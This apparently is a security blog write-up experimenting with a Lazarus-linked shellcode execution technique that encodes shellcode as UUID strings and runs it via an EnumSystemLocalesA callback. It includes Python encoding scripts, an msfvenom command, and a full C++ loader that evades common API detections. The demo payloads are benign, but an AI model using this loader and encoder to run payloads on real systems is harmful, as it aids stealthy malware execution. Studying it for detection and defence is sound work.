Comment on page
Shellcode Execution via EnumSystemLocalA
This post covers a shellcode execution technique that leverages the UuidFromStringA and EnumSystemLocalA APIs to load and execute shellcode
NCCGroup published an excellent research article covering a mostly unknown shellcode execution technique that was being used as part of campaign which is believed to related to the Lazarus Group. The shellcode execution technique uses the
UuidFromStringA
and EnumSystemLocalA
APIs to load shellcode into memory and then execute it. This approach avoids the use of suspicious API calls such as WriteProcessMemory
, CreateThread
and VirtualAlloc
. The full blog post from NCCGroup can be found here:
The rest of this blog post is about experimenting with the technique covered by NCCGroup. For the most part there is no additional insight/information than is already covered in the references blog post.
The shellcode execution technique revolves around the following steps:
- 1.Allocate Target Memory via
HeapAlloc
(or VirtualAlloc directly if you wanted to) - 2.Use
UuidFromStringA
to convert UUID strings their binary format and store in memory - 3.Use
EnumSystemLocalA
to execute the shellcode previously loaded into memory
HeapAlloc
is a common API call to allocate a block of memory on the heap. My understanding of this API is that is allows you to allocate specific amount of memory on the heap, unlike the blocks of memory that you get by using the VirtualAlloc API. However, documentation suggests that HeapAlloc
can still call VirtualAlloc
itself if required.As noted in the NCCGroup blog post this API call:
Takes a pointer to a UUID, which will be used to return the converted binary data. By providing a pointer to an heap address, this function can be (ab)used to both decode data and write it to memory without using common functions such asmemcpy
orWriteProcessMemory
So by calling this API and providing a pointer to a memory address - instead of a pointer to a UUID - the resulting binary representation of the provided UUID will be stored in memory. By chaining a series of calls to this API together and providing specifically crafted UUIDs we can load our desired content (shellcode) into the specified memory region.
To examine how this works, we use the UUIDs used in the NCCGroup blog post as an example and decode them manually. We can run a quick and dirty python script to convert them into their binary representation:
#!/usr/bin/python3
import sys
from uuid import UUID
# UUIDs from NCC Blog Post
uuids = [
"6850c031-6163-636c-5459-504092741551",
"2f728b64-768b-8b0c-760c-ad8b308b7e18",
"1aeb50b2-60b2-2948-d465-488b32488b76",
"768b4818-4810-48ad-8b30-488b7e300357",
"175c8b3c-8b28-1f74-2048-01fe8b541f24",
"172cb70f-528d-ad02-813c-0757696e4575",
"1f748bef-481c-fe01-8b34-ae4801f799ff",
"000000d7-0000-0000-0000-000000000000",
]
output_file = open("/tmp/out.bin","wb")
for uuid in uuids:
output_file.write(UUID(uuid).bytes_le)
output_file.close()
After running the script and opening the resulting
output.bin
file in radare2, we can see that it appears to be valid 64bit shellcode which will use the WinExec API to execute calc: 
If you interested in what this shellcode does line by line you can find a commented version of the shellcode here.
Now that we know how the shellcode is loaded into memory from the UUID strings, we can look at how the
EnumSystemLocalA
API call is utilised to execute the shellcode: 
Looking at the documentation for the API call we can see that it essentially takes a pointer to a callback function. By providing the memory address of our shellcode we can use this function execute it.
Now that we know how the technique works, we can pull together some PoC code. However, before we do that we need to be able to convert our desired shellcode into valid UUID strings. Fortunately this is easy to do with the following python code:
#!usr/bin/python3
from uuid import UUID
import sys
if len(sys.argv) < 2:
print("Usage: %s <shellcode_file>" % sys.argv[0])
sys.exit(1)
with open(sys.argv[1], "rb") as f:
# Read in 16 bytes from our input shellcode
chunk = f.read(16)
while chunk:
# If the chunk is less than 16 bytes then we pad the difference
if len(chunk) < 16:
padding = 16 - len(chunk)
chunk = chunk + (b"\x90" * padding)
print(UUID(bytes_le=chunk))
chunk = f.read(16)
We can generate some example shellcode - which will execute notepad - by using
msfvenom
and then converting the shellcode into UUIDs using the python script above:msfvenom -p windows/exec CMD=notepad -f raw -o /tmp/notepad_shellcode
[-] No platform was selected, choosing Msf::Module::Platform::Windows
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 192 bytes
Saved as: /tmp/notepad_shellcode
$
$ python3 /tmp/convert_to_uuid.py /tmp/notepad_shellcode
"0082e8fc-0000-8960-e531-c0648b50308b"
"528b0c52-8b14-2872-0fb7-4a2631ffac3c"
"2c027c61-c120-0dcf-01c7-e2f252578b52"
"3c4a8b10-4c8b-7811-e348-01d1518b5920"
"498bd301-e318-493a-8b34-8b01d631ffac"
"010dcfc1-38c7-75e0-f603-7df83b7d2475"
"588b58e4-0124-66d3-8b0c-4b8b581c01d3"
"018b048b-89d0-2444-245b-5b61595a51ff"
"5a5f5fe0-128b-8deb-5d6a-018d85b20000"
"31685000-6f8b-ff87-d5bb-f0b5a25668a6"
"ff9dbd95-3cd5-7c06-0a80-fbe07505bb47"
"6a6f7213-5300-d5ff-6e6f-746570616400"
Now that we have our shellcode in UUID format, we can write our PoC code to test:
#include <iostream>
#include <Windows.h>
#include <Rpc.h>
#pragma comment(lib, "Rpcrt4.lib")
int Error(const char* msg) {
printf("%s (%u):", msg, GetLastError());
return 1;
}
int main()
{
// Shellcode as array of UUIDs
const char* uuid_arr[] =
{
"0082e8fc-0000-8960-e531-c0648b50308b",
"528b0c52-8b14-2872-0fb7-4a2631ffac3c",
"2c027c61-c120-0dcf-01c7-e2f252578b52",
"3c4a8b10-4c8b-7811-e348-01d1518b5920",
"498bd301-e318-493a-8b34-8b01d631ffac",
"010dcfc1-38c7-75e0-f603-7df83b7d2475",
"588b58e4-0124-66d3-8b0c-4b8b581c01d3",
"018b048b-89d0-2444-245b-5b61595a51ff",
"5a5f5fe0-128b-8deb-5d6a-018d85b20000",
"31685000-6f8b-ff87-d5bb-f0b5a25668a6",
"ff9dbd95-3cd5-7c06-0a80-fbe07505bb47",
"6a6f7213-5300-d5ff-6e6f-746570616400"
};
// Minimum allocation size for VirtualAlloc
SIZE_T alloc_size = 0x2000;
// Get a handle to the current process
int pid = GetCurrentProcessId();
HANDLE proc_handle = OpenProcess(PROCESS_VM_OPERATION,FALSE, pid);
if (!proc_handle)
Error("OpenProcess Failed");
// Allocate memory in current process to hold our shellcode
// Initial allocation is PAGE_READWRITE
void* mem = VirtualAllocEx(proc_handle, NULL, alloc_size, MEM_COMMIT, PAGE_READWRITE);
if (!mem)
Error("VirtualAlloc Failed");
DWORD_PTR mem_ptr = (DWORD_PTR)mem;
// Loop through our list of UUIDs and use UuidFromStringA
// to convert and load into memory
for (int count = 0; count < sizeof(uuid_arr) / sizeof(uuid_arr[0]); count++) {
RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuid_arr[count], (UUID*)mem_ptr);
if (status != RPC_S_OK) {
CloseHandle(mem);
Error("UuidFromStringA Failed");
}
mem_ptr += 16;
}
MEMORY_BASIC_INFORMATION mem_info;
// Get a handle to the memory region containing our shellcode
// so we can change the page permission
VirtualQueryEx(proc_handle, mem, &mem_info, sizeof(mem_info));
// Use VirtualProtectEx to mark the memory region as executable
if(!VirtualProtectEx(proc_handle, mem, sizeof(mem), PAGE_EXECUTE_READ, &mem_info.Protect))
Error("VirtualProtect Failed");
// Execute our shellcode using EnumSystemLocalesA
if(EnumSystemLocalesA((LOCALE_ENUMPROCA)mem, 0) == 0)
Error("EnumSystemLocalesA Failed");
CloseHandle(mem);
}
In the PoC code above we still use OpenProcess, VirtualAlloc and VirtualProtect which are typically viewed as suspicious. In the Lazarus samples these calls were replaced with a reference to HeapAlloc. The NCCGroup blog post contains code showing how this is done.
Compiling and executing our code shows that the technique is successful and notepad is successfully executed:
